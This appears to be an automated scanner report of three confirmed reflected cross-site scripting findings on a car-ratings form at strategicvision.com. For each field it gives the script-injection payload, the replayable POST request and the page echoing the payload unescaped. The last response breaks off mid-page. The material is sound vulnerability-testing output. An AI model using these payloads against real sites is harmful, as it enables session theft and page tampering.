numCars POST '"--></style></script><script>alert(0x000899)</script>
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000899)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:40:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="'"--></style></script><script>netsparker(0x000899)</script>" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list"..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST '"--></style></script><script>alert(0x0008D0)</script>
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0008D0)%3c%2fscript%3e&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:41:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="'"--></style></script><script>netsparker(0x0008D0)</script>" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list"..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST '"--></style></script><script>alert(0x0008D1)</script>
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0008D1)%3c%2fscript%3e&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:41:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> 